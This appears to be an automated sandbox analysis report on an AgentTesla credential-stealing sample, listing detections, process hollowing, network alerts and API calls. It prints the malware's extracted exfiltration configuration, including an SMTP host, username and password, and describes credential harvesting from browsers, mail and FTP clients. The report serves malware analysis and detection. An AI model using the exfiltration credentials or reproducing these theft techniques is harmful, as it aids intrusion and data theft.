Windows Analysis Report
D6yz87XjgM.exe

Overview

General Information

Sample name: D6yz87XjgM.exe (renamed because original name is a hash value)
Original sample name: 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe
Analysis ID: 1549405
MD5: eb180d9ac3c0ee0feb1b997ef3908f36
SHA1: 17dcf2886e1dce74561ac12b4374b7d441f399b8
SHA256: 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be
Tags: exe, user-adrian__luca
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • D6yz87XjgM.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\D6yz87XjgM.exe" MD5: EB180D9AC3C0EE0FEB1B997EF3908F36)
    • RegAsm.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
4.2.D6yz87XjgM.exe.4090000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.2.D6yz87XjgM.exe.4090000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.D6yz87XjgM.exe.4090000.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.3.D6yz87XjgM.exe.75551c.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.3.D6yz87XjgM.exe.75551c.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                      Networking

                      Source: Network Connection | Author: Joe Security | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7908, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49706

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-11-05T16:05:16.773977+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP
                      2024-11-05T16:06:01.795556+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-11-05T16:06:46.896832+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP

                      AV Detection

                      Source: D6yz87XjgM.exe | Avira: detected
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                      Source: D6yz87XjgM.exe | ReversingLabs: Detection: 36%
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: D6yz87XjgM.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49704 version: TLS 1.2

                      Networking

                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49706 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 162.254.34.31:587
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49741
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:55627
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: D6yz87XjgM.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: D6yz87XjgM.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: D6yz87XjgM.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: D6yz87XjgM.exeString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49704 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D

                      System Summary

                      Source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054A57F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,4_2_0054A57F
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272B06 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272B06
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272AF7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272AF7
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272B02 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272B02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00444061 NtAllocateVirtualMemory,8_2_00444061
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00444095 NtProtectVirtualMemory,8_2_00444095
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441149 NtDelayExecution,8_2_00441149
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004442FC NtProtectVirtualMemory,8_2_004442FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443A8E NtAllocateVirtualMemory,8_2_00443A8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441710 NtClose,8_2_00441710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004413F9 NtCreateThreadEx,8_2_004413F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004444A7 NtProtectVirtualMemory,8_2_004444A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441A74 NtCreateThreadEx,8_2_00441A74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441A33 NtDelayExecution,8_2_00441A33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441ADC NtCreateThreadEx,8_2_00441ADC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044172A NtClose,8_2_0044172A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004443EB NtProtectVirtualMemory,8_2_004443EB
                      Source: D6yz87XjgM.exeStatic PE information: invalid certificate
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameacvm7qw909e.exe vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exeBinary or memory string: OriginalFilenameacvm7qw909e.exe vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@5/1@1/2
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
                      Source: D6yz87XjgM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: D6yz87XjgM.exeReversingLabs: Detection: 36%
                      Source: unknownProcess created: C:\Users\user\Desktop\D6yz87XjgM.exe "C:\Users\user\Desktop\D6yz87XjgM.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: vb6de.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
